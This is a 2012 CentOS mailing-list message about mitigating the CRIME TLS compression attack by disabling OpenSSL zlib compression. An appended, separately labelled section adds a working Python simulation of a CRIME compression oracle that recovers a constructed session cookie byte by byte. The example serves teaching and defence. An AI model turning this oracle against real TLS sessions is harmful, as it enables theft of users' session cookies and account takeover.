[CentOS] SSL CRIME

Tue Sep 25 12:45:00 UTC 2012
Markus Falb <markus.falb at fasel.at>

On 25.9.2012 00:37, Leon Fauster wrote:
> Am 24.09.2012 um 23:49 schrieb Johnny Hughes:
>> On 09/24/2012 06:07 AM, Markus Falb wrote:
>>> Hi,
>>> Some of you have heard of CRIME, probably.
>>>
>>> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
>>>> Adding the following line to the /etc/sysconfig/httpd file:
>>>>
>>>>  export OPENSSL_NO_DEFAULT_ZLIB=1
>>> But are there other services besides http that use ssl and are vulnerable?
>>> What is the optimal place for setting this environment variable system wide?
>>>
>>> I tried to set it in
>>> /etc/profile.d/CRIME.sh
>>> /etc/bashrc
>>> without success.
>>
>> The setting only matters if programs look for it and do something with
>> it ... so you would need to set it for the user that starts whatever
>> service you are trying to protect, if that daemon actually uses the
>> variable.
>>
>> Just because a variable does something in httpd, that does not mean the
>> same variable means the same thing to sshd or any other daemon.
> 
> it's in openssl itself (rhel5/6)
> 
> http://pkgs.fedoraproject.org/cgit/openssl.git/tree/openssl-0.9.8j-env-nozlib.patch?id=1d20b5f2
> 
> IMO, the same above would also apply for e. g. /etc/sysconfig/ldap ...

That was my understanding too. And instead of fixing X services I would
like to fix it for all services at once in one central location.

One could do it in /etc/init.d/functions maybe, but I doubt that it
would survive an update of initscripts.

Now that SSL compression has become security-relevant, maybe the openssl
default should be changed: default off, enabled only explicitly. Leon, I
know you suggested building a custom openssl package in an earlier
message, but to be honest, I am not very enthusiastic about maintaining
my own openssl. Maybe an upstream bugzilla should be filed.

Another related question: what services are vulnerable to CRIME or the
concepts behind CRIME, and what services are not? Everyone is only
talking about http. For example, I think that smtp is not vulnerable if
it does not support smtp auth, or maybe ftp is not vulnerable because it
uses a separate data channel, and so on...
-- 
Kind Regards, Markus Falb

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 304 bytes
Desc: OpenPGP digital signature
URL: <http://lists.centos.org/pipermail/centos/attachments/20120925/5df56b2b/attachment-0005.sig>
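Added example, not part of the thread: a toy CRIME-style compression oracle in Python, illustrating the "concept behind CRIME" that Markus asks about. The host, path, cookie name and cookie value are constructed for the example. The request shape is the HTTP case, but the reasoning is the same for any protocol where an attacker can get bytes of their choosing compressed in the same TLS stream as a secret: the ciphertext length tracks the compressed plaintext length, and DEFLATE makes that length depend on how much of the secret the attacker's bytes repeat. Fixed Huffman codes are forced (zlib strategy Z_FIXED) so the size depends only on the LZ77 matches; with the default dynamic codes the leak is the same but noisier.

```python
"""
Toy CRIME-style compression oracle (constructed example, not from the thread).

The attacker controls the request path; the victim's client appends a
secret cookie.  TLS hides the bytes but (block padding aside) not the
length of the compressed plaintext.  When the path repeats the start of
the cookie, LZ77 replaces the repeated bytes in the cookie with a
back-reference and the request shrinks.  Byte by byte, that leaks the
cookie.
"""
import string
import zlib

# Constructed secret the attacker wants to recover.
SECRET_COOKIE = "sessionid=d41d8cd98f00b204"
# Candidate characters for each unknown byte (hex digits are a subset).
ALPHABET = string.ascii_lowercase + string.digits
# Bytes >= 0x90 cost 9 bits as fixed-Huffman literals, so each one shifts
# the bit alignment of the stream by one; used to defeat the byte
# granularity of the observed length.  They occur nowhere else in the request.
PAD_BYTES = bytes(range(0xA0, 0xA8))


def build_request(path: bytes, cookie: str = SECRET_COOKIE) -> bytes:
    """Plaintext the victim's client sends: attacker path, secret cookie."""
    return (b"GET /" + path + b" HTTP/1.1\r\n"
            b"Host: example.test\r\n"
            b"Cookie: " + cookie.encode() + b"\r\n\r\n")


def deflate(data: bytes) -> bytes:
    """Compress as TLS/SPDY compression did, with fixed Huffman codes forced
    (zlib strategy Z_FIXED, numeric value 4) so that the output size depends
    only on LZ77 matches and every ASCII literal costs exactly 8 bits."""
    co = zlib.compressobj(level=9, wbits=15, memLevel=9,
                          strategy=getattr(zlib, "Z_FIXED", 4))
    return co.compress(data) + co.flush()


def wire_length(guess: str, cookie: str = SECRET_COOKIE) -> int:
    """Compressed length (bytes) an on-path attacker observes for one request."""
    return len(deflate(build_request(guess.encode(), cookie)))


def oracle_score(guess: str, cookie: str = SECRET_COOKIE) -> int:
    """Sum of wire lengths over eight requests padded with 0..7 nine-bit
    literals.  The paddings walk through every bit alignment, so the sum
    grows by exactly one per bit of DEFLATE output: a byte-granular
    measurement becomes an exact bit-length comparison."""
    return sum(len(deflate(build_request(guess.encode() + PAD_BYTES[:n], cookie)))
               for n in range(8))


def recover_secret(known_prefix: str, cookie: str = SECRET_COOKIE,
                   max_len: int = 64) -> str:
    """Extend known_prefix one byte at a time: the candidate that compresses
    strictly best is the next secret byte.  Stops when no candidate wins,
    which happens once the guess runs past the end of the cookie value."""
    recovered = known_prefix
    for _ in range(max_len):
        scores = {c: oracle_score(recovered + c, cookie) for c in ALPHABET}
        best = min(scores.values())
        winners = [c for c, s in scores.items() if s == best]
        if len(winners) != 1:
            break
        recovered += winners[0]
    return recovered


if __name__ == "__main__":
    print("full secret in path :", wire_length(SECRET_COOKIE), "bytes")
    print("16 wrong chars      :", wire_length("sessionid=0123456789abcdef"), "bytes")
    print("recovered           :", recover_secret("sessionid="))
```

A single measurement (wire_length) is reported in whole bytes, and one correctly guessed character saves only about seven bits, so it does not always change the observed size; oracle_score is the padding trick that makes the correct candidate win strictly every time, which is the kind of alignment handling a real CRIME tool needs. Turning compression off, which is what OPENSSL_NO_DEFAULT_ZLIB=1 does for OpenSSL's default, removes the dependence of the length on the cookie entirely, whatever the protocol on top of TLS.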